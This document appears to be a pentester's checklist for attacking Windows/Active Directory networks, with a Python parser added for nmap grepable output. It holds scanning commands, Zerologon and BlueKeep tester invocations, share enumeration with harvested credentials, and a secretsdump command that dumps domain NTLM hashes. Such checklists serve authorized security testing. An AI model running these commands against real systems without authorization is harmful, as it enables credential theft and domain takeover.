Methodology

  1. Run nmap

    mkdir scan
    nmap -T4 -iL scope.txt -Pn -p21,22,139,445,3389,88,389,135,1433,3306 --open -vv -oG scan/alive.txt
    # -iL takes the scope file as its argument; several NSE scripts go in one comma-separated --script
    nmap -T4 -sV --script=default,banner,vulners -iL scope.txt --top-ports 3700 -vv -oA scan/full-tcp-res
    nmap -T4 -sV -p445 -Pn -iL scope.txt -vv --script smb-security-mode,smb-vuln-ms17-010 -oA scan/smb-scan
    
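Triaging the grepable output written by the first nmap command in step 1 (`-oG scan/alive.txt`) is easier with a small parser. The following is an added example, not part of the original checklist: it reads the `-oG` format into a host-to-open-ports map and lets you pull out, for instance, every host with 445 open to feed into the share check in step 2. The scan text in `SAMPLE_OG` is constructed for the example; the function names are my own.

```python
from collections import defaultdict

# Constructed sample of nmap grepable (-oG) output; not output from a real scan.
# Fields on a "Host:" line are tab-separated; port entries are
# port/state/proto/owner/service/rpcinfo/version/ separated by ", ".
SAMPLE_OG = """\
# Nmap 7.94 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -T4 -iL scope.txt -Pn -p21,22,139,445,3389 --open -vv -oG scan/alive.txt
Host: 10.10.1.5 ()\tStatus: Up
Host: 10.10.1.5 ()\tPorts: 22/open/tcp//ssh///, 445/open/tcp//microsoft-ds///\tIgnored State: filtered (3)
Host: 10.10.1.9 (fileserver.corp.example)\tStatus: Up
Host: 10.10.1.9 (fileserver.corp.example)\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///\tIgnored State: filtered (2)
# Nmap done at Mon Jan  1 10:00:07 2024 -- 2 IP addresses (2 hosts up) scanned in 7.12 seconds
"""


def parse_grepable(text):
    """Return {ip: {port: service}} for every open port found in -oG output."""
    hosts = defaultdict(dict)
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # skip the '# Nmap ...' header and footer comment lines
        # Split the tab-separated "Key: value" fields into a dict.
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        ip = fields["Host"].split(" ", 1)[0]  # "10.10.1.5 (hostname)" -> "10.10.1.5"
        if "Ports" not in fields:
            continue  # the bare "Status: Up" line carries no port data
        for entry in fields["Ports"].split(", "):
            port, state, _proto, _owner, service = entry.split("/")[:5]
            if state == "open":
                hosts[ip][int(port)] = service
    return dict(hosts)


def hosts_with_port(parsed, port):
    """Sorted list of hosts exposing the given port (e.g. 445 for the SMB share check)."""
    return sorted(ip for ip, ports in parsed.items() if port in ports)


if __name__ == "__main__":
    result = parse_grepable(SAMPLE_OG)
    for ip, ports in result.items():
        print(ip, ",".join(f"{p}/{s}" for p, s in sorted(ports.items())))
    print("hosts with 445 open:", hosts_with_port(result, 445))
```

Pipe the real `scan/alive.txt` into `parse_grepable` instead of the constructed sample; `hosts_with_port(result, 445)` then gives the host list for the `cme` share enumeration without grepping by hand.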
  2. Run cme on all shares, find open/unauthenticated ones

  3. Discover HTTP services

    1. httpx
    2. nuclei
    3. gowitness (to discover admin panels)

  4. NetBIOS/LLMNR Spoofing

  5. DC Sync / Zerologon

    git clone https://github.com/SecuraBV/CVE-2020-1472
    cd CVE-2020-1472
    pip install -r requirements.txt
    ./zerologon_tester.py EXAMPLE-DC 1.2.3.4
    
  6. Bluekeep

    git clone https://github.com/robertdavidgraham/rdpscan.git
    cd rdpscan
    make
    ./rdpscan 192.168.1.1-192.168.1.255
    
  7. Password spray the DC

    1. The ones cracked from the responder

  8. Checking default credentials on embedded devices

  9. Checking "dumb-ports"

    1. FTP, Telnet, etc.

When you get credentials (Must check)

  1. Kerberoasting

  2. Bloodhound

  3. Slinky - Expand Access

  4. Shares

    cme smb hosts.txt -u 'user' -p 'pass' --shares | tee auth-user-1
    grep -ai "read\|write" auth-user-1
    smbclient.py user@ip
    # You can also try ftp shares with these creds with limited success. 
    # Perhaps also ssh ;)
    

After getting DA

  1. Dump Passwords & Crack

    python3 secretsdump.py -just-dc-ntlm CORP/<user>@<dc-ip> | tee -a dump
    cme smb ips.txt -u 'user' -p 'pass' --pass-pol # for screenshot for finding
    

Useful Links

WADComs - An interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.